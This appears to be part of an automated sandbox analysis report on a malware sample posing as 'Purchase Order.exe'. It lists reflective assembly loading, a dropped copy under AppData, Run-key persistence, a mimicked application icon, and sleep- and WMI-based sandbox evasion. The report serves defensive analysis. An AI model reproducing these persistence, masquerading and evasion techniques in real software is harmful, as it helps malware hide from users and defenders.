                    Source: Puizg.exe.0.dr, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.0.Purchase Order.exe.740000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 0.2.Purchase Order.exe.740000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 20.2.Puizg.exe.fa0000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 20.0.Puizg.exe.fa0000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 23.0.Puizg.exe.280000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 23.2.Puizg.exe.280000.0.unpack, Form3.cs.Net Code: button1_Click System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_01261C58 push ebx; iretd
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_07C12CDC push eax; ret
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_07C101FE push cs; ret
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_080D2CA9 push ecx; ret
                    Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_080D07E7 push 8B039B89h; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065697E9 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065692C3 push 8B000003h; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06563330 push es; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06563330 push es; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06560040 pushfd ; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06562177 push edi; retn 0000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065641D1 push es; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065641D9 push es; iretd
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06569841 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065618F6 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065618BD push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_065618AA push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06561909 push es; ret
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0689DF58 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06940040 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941599 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_0694158D push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941291 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_069412A1 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_069412ED push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_069413D1 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_069413C1 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941339 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941329 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941375 push es; retf
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06941045 push es; retf
                    Source: Purchase Order.exeStatic PE information: 0x911D7309 [Sun Feb 24 13:05:13 2047 UTC]
                    Source: C:\Users\user\Desktop\Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Purchase Order.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PuizgJump to behavior
                    Source: C:\Users\user\Desktop\Purchase Order.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PuizgJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Purchase Order.exe TID: 6164Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\Purchase Order.exe TID: 5852Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 6460Thread sleep count: 168 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6740Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6744Thread sleep count: 5417 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6744Thread sleep count: 3228 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6676Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3372Thread sleep count: 112 > 30
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 3684Thread sleep count: 57 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
